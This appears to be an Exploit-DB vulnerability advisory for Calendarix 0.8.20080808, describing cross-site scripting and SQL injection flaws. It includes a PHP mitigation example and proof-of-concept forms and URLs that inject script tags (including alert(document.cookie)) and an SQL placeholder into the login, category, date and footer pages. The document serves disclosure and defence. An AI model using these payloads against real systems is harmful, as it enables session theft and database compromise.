Vendor: Calendarix
By: Unknown
CVSS: 5.5 (MEDIUM)
Vulnerability types: Cross-Site Scripting, SQL Injection
CWE: 79, 89
Product Name: Calendarix
Affected Version From: 0.8.20080808
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown

Multiple Cross-Site Scripting and SQL Injection Vulnerabilities in Calendarix

The Calendarix application fails to sanitize user-supplied input, which leads to multiple cross-site scripting vulnerabilities and an SQL injection vulnerability. By exploiting these vulnerabilities, an attacker could steal authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Validate user-supplied input against an allow-list where possible, use parameterized queries for every database access, and encode output for the HTML or JavaScript context it is written into, to prevent cross-site scripting and SQL injection attacks. Regularly update the Calendarix application to the latest version to address any security vulnerabilities.
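As an added example (not Calendarix's own code), one way the mitigation above looks in PHP for the parameters named in the PoCs below (login, gocat, frmname, leftfooter); the PDO connection, the users table, the category ids and the page fragment at the end are assumptions.

```php
<?php
// Added example, not Calendarix's code: hardened handling of the parameters named in
// this advisory (login, gocat, frmname, leftfooter). The users table, the PDO
// connection, the category ids and the page fragment at the end are assumptions.
declare(strict_types=1);

// CWE-89: bind the login value as a parameter; a quote inside it is data, not SQL.
function findUser(PDO $pdo, string $login): ?array
{
    $stmt = $pdo->prepare('SELECT id, password_hash FROM users WHERE login = :login');
    $stmt->execute([':login' => $login]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// CWE-79, HTML context: encode <, >, &, " and ' (the login and gocat PoCs open with a quote).
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// CWE-79, JavaScript context: the frmname payload closes a <script> block, so a value
// embedded in script is JSON-encoded with < and > written as \u003C and \u003E.
function js(string $value): string
{
    return (string) json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// Allow-list validation for identifiers such as gocat: accept only known category ids.
function validCategory(string $gocat, array $knownIds): ?string
{
    return in_array($gocat, $knownIds, true) ? $gocat : null;
}

// Constructed in-memory database so the snippet runs stand-alone.
$pdo = new PDO('sqlite::memory:');
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT UNIQUE, password_hash TEXT)');
$pdo->prepare('INSERT INTO users (login, password_hash) VALUES (?, ?)')
    ->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]);

$login = (string) ($_POST['login'] ?? "alice' --");           // PoC-style input when nothing is posted
$user = findUser($pdo, $login);                                // null: the quote stayed data
$ok = $user !== null && password_verify((string) ($_POST['password'] ?? ''), $user['password_hash']);
$cat = validCategory((string) ($_POST['gocat'] ?? ''), ['1', '2', '3']) ?? 'none';
// cal_login.php/<payload> is a form action built from the request path: encode it (or hard-code it).
$action = h($_SERVER['PHP_SELF'] ?? '/cal_login.php') . '?op=login';
?>
<form action="<?= $action ?>" method="post" name="main"><input name="login" value="<?= h($login) ?>"></form>
<script>var frmname = <?= js((string) ($_GET['frmname'] ?? '')) ?>;</script>
<div id="footer"><?= h((string) ($_GET['leftfooter'] ?? '')) ?> | category <?= h($cat) ?> | login <?= $ok ? 'ok' : 'failed' ?></div>
```

Run from the command line the script prints the fragment with the quote in the default login value rendered as `&#039;` and `findUser` returning null, which is the behaviour the encoded and parameterized paths should show for each PoC input.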

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47790/info


Calendarix is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Calendarix 0.8.20080808 is vulnerable; other versions may also be affected.


<form action="http://www.example.com/cal_login.php?op=login" method="post" name="main">
<input type="hidden" name="login" value="&#039;SQL_CODE_HERE"/>
<input type="hidden" name="password" value=""/>
<input type="submit" value="submit"/>
</form>

http://www.example.com/cal_login.php/%27%3E%3Cscript%3Ealert%28123%29;%3C/script%3E

<form action="http://www.example.com/cal_catview.php?catop=viewcat" method="post" name="main">
<input type="hidden" name="gocat" value="&#039;</script><script>alert(document.cookie);</script>"/>
<input type="submit" value="submit"/>
</form>


http://www.example.com/cal_date.php?frmname=%3C/script%3E%3Cscript%3Ealert%28123%29;%3C/script%3E

http://www.example.com/cal_footer.inc.php?leftfooter=%3Cscript%3Ealert%28123%29;%3C/script%3E